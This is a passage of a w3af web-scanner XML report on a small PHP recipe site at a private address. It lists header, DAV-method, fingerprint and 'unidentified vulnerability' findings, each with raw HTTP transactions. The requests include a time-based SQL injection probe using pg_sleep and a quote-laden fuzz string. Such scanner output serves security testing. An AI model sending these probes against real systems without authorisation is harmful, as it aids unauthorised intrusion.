            <http-transaction id="864">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/1%22+or+pg_sleep%283%29+and+%221%22%3D%221 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 1%22+or+pg_sleep%283%29+and+%221%22%3D%221 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='1%22+or+pg_sleep%283%29+and+%221%22%3D%221'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
        </http-transactions>
    </vulnerability>
    <information id="[16]" name="Strange header" plugin="strange_headers" url="http://10.12.68.25:31337/">
        <description>The remote web server sent the HTTP header: &quot;host&quot; with value: &quot;10.12.68.25:31337&quot;, which is quite uncommon and requires manual analysis. This information was found in the request with id 16.</description>
        <http-transactions>
            <http-transaction id="16">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="16">
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h1&gt;List of recipes&lt;/h1&gt;

    &lt;ul&gt;
        &lt;li&gt;&lt;a href=&quot;/choucroute&quot;&gt;Choucroute garnie&lt;/a&gt;&lt;/li&gt;
        &lt;li&gt;&lt;a href=&quot;/cake&quot;&gt;Chocolate cake&lt;/a&gt;&lt;/li&gt;
        ... And more to come!
    &lt;/ul&gt;
    &lt;a href='/'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
        </http-transactions>
    </information>
    <information id="[38]" name="Omitted server header" plugin="server_header" url="None">
        <description>The remote HTTP Server omitted the &quot;server&quot; header in its response. This information was found in the request with id 38.</description>
        <http-transactions>
            <http-transaction id="38">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="38">
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h1&gt;List of recipes&lt;/h1&gt;

    &lt;ul&gt;
        &lt;li&gt;&lt;a href=&quot;/choucroute&quot;&gt;Choucroute garnie&lt;/a&gt;&lt;/li&gt;
        &lt;li&gt;&lt;a href=&quot;/cake&quot;&gt;Chocolate cake&lt;/a&gt;&lt;/li&gt;
        ... And more to come!
    &lt;/ul&gt;
    &lt;a href='/'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
        </http-transactions>
    </information>
    <information id="[87]" name="Powered-by header" plugin="server_header" url="None">
        <description>The x-powered-by header for the target HTTP server is &quot;PHP/5.6.9&quot;. This information was found in the request with id 87.</description>
        <http-transactions>
            <http-transaction id="87">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="87">
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h1&gt;List of recipes&lt;/h1&gt;

    &lt;ul&gt;
        &lt;li&gt;&lt;a href=&quot;/choucroute&quot;&gt;Choucroute garnie&lt;/a&gt;&lt;/li&gt;
        &lt;li&gt;&lt;a href=&quot;/cake&quot;&gt;Chocolate cake&lt;/a&gt;&lt;/li&gt;
        ... And more to come!
    &lt;/ul&gt;
    &lt;a href='/'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
        </http-transactions>
    </information>
    <information id="[36, 53, 60, 77, 205, 248, 258, 348, 400, 429, 437, 477, 510, 521, 544, 595, 606, 617, 630, 669, 676, 683, 707, 727, 739]" name="DAV methods enabled" plugin="allowed_methods" url="http://10.12.68.25:31337/">
        <description>The URL &quot;http://10.12.68.25:31337/&quot; has the following allowed methods. These include DAV methods and should be disabled: *, CHECKOUT, CONNECT, COPY, GET, HEAD, LOCK, MERGE, MKACTIVITY, MKCOL, MKDIR, MKWORKSPACE, MOVE, NOTIFY, OPTIONS, PATCH, POST, PROPFIND, PROPPATCH, REPORT, SUBSCRIBE, TRACE, UNLOCK, UNSUBSCRIBE. This information was found in the requests with ids 36, 53, 60, 77, 205, 248, 258, 348, 400, 429, 437, 477, 510, 521, 544, 595, 606, 617, 630, 669, 676, 683, 707, 727 and 739.</description>
        <http-transactions>
            <http-transaction id="36">
                <httprequest>
                    <status>OPTIONS http://10.12.68.25:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="36">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about  has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href=''&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="53">
                <httprequest>
                    <status>MKCOL http://10.12.68.25:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="53">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about  has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href=''&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="60">
                <httprequest>
                    <status>MOVE http://10.12.68.25:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="60">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about  has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href=''&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="77">
                <httprequest>
                    <status>HEAD http://10.12.68.25:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="77">
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                </httpresponse>
            </http-transaction>
            <http-transaction id="205">
                <httprequest>
                    <status>REPORT http://10.12.68.25:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="205">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about  has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href=''&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="248">
                <httprequest>
                    <status>NOTIFY http://10.12.68.25:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="248">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about  has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href=''&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="258">
                <httprequest>
                    <status>OPTIONS http://10.12.68.25:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="258">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about  has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href=''&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="348">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="348">
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h1&gt;List of recipes&lt;/h1&gt;

    &lt;ul&gt;
        &lt;li&gt;&lt;a href=&quot;/choucroute&quot;&gt;Choucroute garnie&lt;/a&gt;&lt;/li&gt;
        &lt;li&gt;&lt;a href=&quot;/cake&quot;&gt;Chocolate cake&lt;/a&gt;&lt;/li&gt;
        ... And more to come!
    &lt;/ul&gt;
    &lt;a href='/'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="437">
                <httprequest>
                    <status>CHECKOUT http://10.12.68.25:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="437">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about  has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href=''&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="477">
                <httprequest>
                    <status>PROPFIND http://10.12.68.25:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="477">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about  has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href=''&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="510">
                <httprequest>
                    <status>SUBSCRIBE http://10.12.68.25:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="510">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about  has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href=''&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="521">
                <httprequest>
                    <status>LOCK http://10.12.68.25:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="521">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about  has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href=''&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="544">
                <httprequest>
                    <status>MKDIR http://10.12.68.25:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="544">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about  has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href=''&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="606">
                <httprequest>
                    <status>MERGE http://10.12.68.25:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="606">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about  has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href=''&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="617">
                <httprequest>
                    <status>UNLOCK http://10.12.68.25:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="617">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about  has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href=''&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="630">
                <httprequest>
                    <status>PROPPATCH http://10.12.68.25:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="630">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about  has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href=''&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="669">
                <httprequest>
                    <status>POST http://10.12.68.25:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="0" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                </httprequest>
                <httpresponse id="669">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about  has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href=''&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="676">
                <httprequest>
                    <status>COPY http://10.12.68.25:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="676">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about  has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href=''&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="683">
                <httprequest>
                    <status>TRACE http://10.12.68.25:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="683">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about  has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href=''&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="707">
                <httprequest>
                    <status>PATCH http://10.12.68.25:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="707">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about  has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href=''&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="727">
                <httprequest>
                    <status>UNSUBSCRIBE http://10.12.68.25:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="727">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about  has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href=''&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="739">
                <httprequest>
                    <status>MKACTIVITY http://10.12.68.25:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="739">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about  has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href=''&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
        </http-transactions>
    </information>
    <information id="[1]" name="Webserver fingerprint" plugin="hmap" url="None">
        <description>The most accurate fingerprint for this HTTP server is: &quot;JigSaw 2.2.2 (Solaris 8)&quot;. This information was found in the request with id 1.</description>
        <http-transactions>
            <http-transaction id="1">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="1">
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h1&gt;List of recipes&lt;/h1&gt;

    &lt;ul&gt;
        &lt;li&gt;&lt;a href=&quot;/choucroute&quot;&gt;Choucroute garnie&lt;/a&gt;&lt;/li&gt;
        &lt;li&gt;&lt;a href=&quot;/cake&quot;&gt;Chocolate cake&lt;/a&gt;&lt;/li&gt;
        ... And more to come!
    &lt;/ul&gt;
    &lt;a href='/'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
        </http-transactions>
    </information>
    <information id="[238, 285, 312]" name="Unidentified vulnerability" plugin="generic" url="http://10.12.68.25:31337/d%27kc%22z%27gj%27%22%2A%2A5%2A%28%28%28%3B-%2A%60%29">
        <description>An unidentified vulnerability was found at: &quot;http://10.12.68.25:31337/d%27kc%22z%27gj%27%22%2A%2A5%2A%28%28%28%3B-%2A%60%29&quot;, using HTTP method GET. The modified parameter was the URL filename, with value: &quot;d'kc&quot;z'gj'&quot;**5*(((;-*`)&quot;. This vulnerability was found in the requests with ids 238, 285 and 312.</description>
        <http-transactions>
            <http-transaction id="238">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/choucroute HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="238">
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;Choucroute Garnie&lt;/h2&gt;

    &lt;ul&gt;
        &lt;li&gt;1/3 cup kosher salt, plus more for seasoning&lt;/li&gt;
        &lt;li&gt;2 tablespoons light brown sugar&lt;/li&gt;
        &lt;li&gt;3 pounds pork back ribs or baby back ribs, cut into 3 sections&lt;/li&gt;
        &lt;li&gt;6 pounds sauerkraut (in plastic bags), drained&lt;/li&gt;
        &lt;li&gt;1/4 cup duck or goose fat or peanut oil&lt;/li&gt;
        &lt;li&gt;1 large onion, coarsely chopped&lt;/li&gt;
        &lt;li&gt;4 large garlic cloves, coarsely chopped&lt;/li&gt;
        &lt;li&gt;20 juniper berries&lt;/li&gt;
        &lt;li&gt;3 large bay leaves&lt;/li&gt;
        &lt;li&gt;1/2 teaspoon caraway seeds&lt;/li&gt;
        &lt;li&gt;1 teaspoon freshly ground black pepper&lt;/li&gt;
        &lt;li&gt;3 cups chicken stock&lt;/li&gt;
